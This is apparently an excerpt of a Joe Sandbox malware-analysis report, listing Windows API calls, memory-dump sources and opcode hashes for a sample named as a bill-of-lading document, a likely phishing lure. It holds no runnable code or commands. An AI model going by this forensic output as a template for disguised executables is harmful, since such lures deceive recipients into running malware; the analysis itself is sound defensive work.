                                                                                                                      • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                      • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                      • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1822080540-0
                                                                                                                      • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                      • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                      • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                      • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 659298297-0
                                                                                                                      • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                      • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                      • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                      • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorMenuPopupTrack$Proc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300944170-0
                                                                                                                      • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                      • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                      • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                      • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                        • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                        • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(030D1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(030D1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableMessageSend$LongShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 142311417-0
                                                                                                                      • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                      • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                      • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                      • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0044955A
                                                                                                                        • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                      • _wcslen.LIBCMT ref: 004495C1
                                                                                                                      • _wcslen.LIBCMT ref: 004495CE
                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1843234404-0
                                                                                                                      • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                      • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                      • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                      • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                      • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                      • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                      • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                      • _wcslen.LIBCMT ref: 004457A3
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3087257052-0
                                                                                                                      • Opcode ID: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                      • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                      • Opcode Fuzzy Hash: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                      • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                      • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                      • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                      • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                      • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                      • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                      • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                      • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 245547762-0
                                                                                                                      • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                                      • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                      • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                                      • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                      • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2338827641-0
                                                                                                                      • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                      • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                      • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                      • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                      • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                      • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                      • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 0046FD00
                                                                                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                      • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyIcon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3419509030-0
                                                                                                                      • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                      • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                      • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                      • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                      APIs
                                                                                                                      • __getptd.LIBCMT ref: 004175AE
                                                                                                                        • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                        • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                      • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                      • __lock.LIBCMT ref: 004175DE
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                      • InterlockedIncrement.KERNEL32(030D2D00), ref: 00417626
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271482742-0
                                                                                                                      • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                      • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                      • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                      • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4023252218-0
                                                                                                                      • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                      • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                      • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                      • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                      • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                      • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                      • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                      • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1489400265-0
                                                                                                                      • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                      • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                      • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                      • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1042038666-0
                                                                                                                      • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                      • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                      • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                      • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                      • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                      • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                      • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
